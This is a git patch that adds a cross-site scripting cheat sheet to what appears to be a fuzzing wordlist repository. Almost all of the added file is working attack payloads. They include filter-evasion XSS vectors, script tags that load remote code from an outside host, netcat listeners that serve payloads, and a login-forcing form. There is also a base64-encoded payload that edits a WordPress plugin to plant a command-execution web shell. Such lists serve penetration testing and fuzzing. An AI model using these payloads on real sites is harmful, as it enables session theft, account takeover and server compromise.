From 601038eb4ea18c97177b43a757286d3c8a815db8 Mon Sep 17 00:00:00 2001
From: Daniel Miessler <daniel@danielmiessler.com>
Date: Wed, 13 Jul 2016 12:58:49 -0700
Subject: [PATCH] Added @Brutelogic's brilliant XSS Cheatsheet.

---
 Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt | 141 ++++++++++++++++++++++++++
 1 file changed, 141 insertions(+)
 create mode 100644 Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt

diff --git a/Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt b/Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt
new file mode 100644
index 00000000000..b691ce97214
--- /dev/null
+++ b/Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt
@@ -0,0 +1,141 @@
+<svg onload=alert(1)>
+"><svg onload=alert(1)//
+"onmouseover=alert(1)//
+"autofocus/onfocus=alert(1)//
+'-alert(1)-'
+'-alert(1)//
+\'-alert(1)//
+</script><svg onload=alert(1)>
+http://DOMAIN/PAGE.php/"><svg onload=alert(1)>
+<svg onload=alert`1`>
+<svg onload=alert&lpar;1&rpar;>
+<svg onload=alert&#x28;1&#x29>
+<svg onload=alert&#40;1&#41>
+(alert)(1)
+a=alert,a(1)
+[1].find(alert)
+top["al"+"ert"](1)
+top[/al/.source+/ert/.source](1)
+al\u0065rt(1)
+top['al\145rt'](1)
+top['al\x65rt'](1)
+top[8680439..toString(30)](1)
+<x contenteditable onblur=alert(1)>lose focus! 
+<x onclick=alert(1)>click this! 
+<x oncopy=alert(1)>copy this! 
+<x oncontextmenu=alert(1)>right click this! 
+<x oncut=alert(1)>copy this! 
+<x ondblclick=alert(1)>double click this! 
+<x ondrag=alert(1)>drag this! 
+<x contenteditable onfocus=alert(1)>focus this! 
+<x contenteditable oninput=alert(1)>input here! 
+<x contenteditable onkeydown=alert(1)>press any key! 
+<x contenteditable onkeypress=alert(1)>press any key! 
+<x contenteditable onkeyup=alert(1)>press any key! 
+<x onmousedown=alert(1)>click this! 
+<x onmousemove=alert(1)>hover this! 
+<x onmouseout=alert(1)>hover this! 
+<x onmouseover=alert(1)>hover this! 
+<x onmouseup=alert(1)>click this! 
+<x contenteditable onpaste=alert(1)>paste here!
+<script>alert(1)// 
+<script>alert(1)<!–
+<script src=//brutelogic.com.br/1.js> 
+<script src=//3334957647/1>
+%3Cx onxxx=1 
+<%78 onxxx=1 
+<x %6Fnxxx=1 
+<x o%6Exxx=1 
+<x on%78xx=1 
+<x onxxx%3D1
+<X onxxx=1 
+<x OnXxx=1 
+<X OnXxx=1 
+<x onxxx=1 onxxx=1
+<x/onxxx=1 
+<x%09onxxx=1 
+<x%0Aonxxx=1 
+<x%0Conxxx=1 
+<x%0Donxxx=1 
+<x%2Fonxxx=1 
+<x 1='1'onxxx=1 
+<x 1="1"onxxx=1
+<[S]x onx[S]xx=1
+[S] = stripped char or string
+<x </onxxx=1 
+<x 1=">" onxxx=1 
+<http://onxxx%3D1/
+<x onxxx=alert(1) 1='
+<svg onload=setInterval(function(){with(document)body. 
+appendChild(createElement('script')).src='//HOST:PORT'},0)> 
+$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
+'onload=alert(1)><svg/1='
+'>alert(1)</script><script/1=' 
+*/alert(1)</script><script>/*
+*/alert(1)">'onload="/*<svg/1='
+`-alert(1)">'onload="`<svg/1='
+*/</script>'>alert(1)/*<script/1='
+p=<svg/1='&q='onload=alert(1)>
+p=<svg 1='&q='onload='/*&r=*/alert(1)'>
+<script>alert(1)</script> 
+<script src=javascript:alert(1)> 
+<iframe src=javascript:alert(1)> 
+<embed src=javascript:alert(1)> 
+<a href=javascript:alert(1)>click 
+<math><brute href=javascript:alert(1)>click 
+<form action=javascript:alert(1)><input type=submit> 
+<isindex action=javascript:alert(1) type=submit value=click> 
+<form><button formaction=javascript:alert(1)>click 
+<form><input formaction=javascript:alert(1) type=submit value=click> 
+<form><input formaction=javascript:alert(1) type=image value=click> 
+<form><input formaction=javascript:alert(1) type=image src=SOURCE> 
+<isindex formaction=javascript:alert(1) type=submit value=click> 
+<object data=javascript:alert(1)> 
+<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> 
+<svg><script xlink:href=data:,alert(1) /> 
+<math><brute xlink:href=javascript:alert(1)>click 
+<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
+<html ontouchstart=alert(1)> 
+<html ontouchend=alert(1)> 
+<html ontouchmove=alert(1)> 
+<html ontouchcancel=alert(1)>
+<body onorientationchange=alert(1)>
+<svg onload=alert(navigator.connection.type)> 
+<svg onload=alert(navigator.battery.level)> 
+<svg onload=alert(navigator.battery.dischargingTime)>
+<svg onload=alert(navigator.battery.charging)>
+<svg onload=navigator.vibrate(500)> 
+<svg onload=navigator.vibrate([500,300,100])>
+<iframe src=LOGOUT_URL onload=forms[0].submit()> 
+</iframe><form method=post action=LOGIN_URL> 
+<input name=USERNAME_PARAMETER_NAME value=USERNAME> 
+<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
+"><img src=1 onerror=alert(1)>.gif
+$ exiftool -Artist='"><img src=1 onerror=alert(1)>' FILENAME.jpeg
+<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
+GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
+<script src="data:&comma;alert(1)// 
+"><script src=data:&comma;alert(1)// 
+<script src="//brutelogic.com.br&sol;1.js&num; 
+"><script src=//brutelogic.com.br&sol;1.js&num; 
+<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; 
+"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
+<?php header(“Access-Control-Allow-Origin: *”); ?>
+<img src=1 onerror=alert(1)>
+<svg onload=eval(URL.slice(-8))>#alert(1)
+<svg onload=eval(location.hash.slice(1)>#alert(1)
+<svg onload=innerHTML=location.hash>#<script>alert(1)</script>
+<base href=//0>
+$ while:; do echo "alert(1)" | nc -lp80; done
+<script/src="data:&comma;eval(atob(location.hash.slice(1)))//&num;
+#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
+Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
+aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
+X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
+5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
+RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
+9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
+wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
+Qp4LnNlbmQoJCk=
+http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
+& => %26 , # => %23 , + => %2B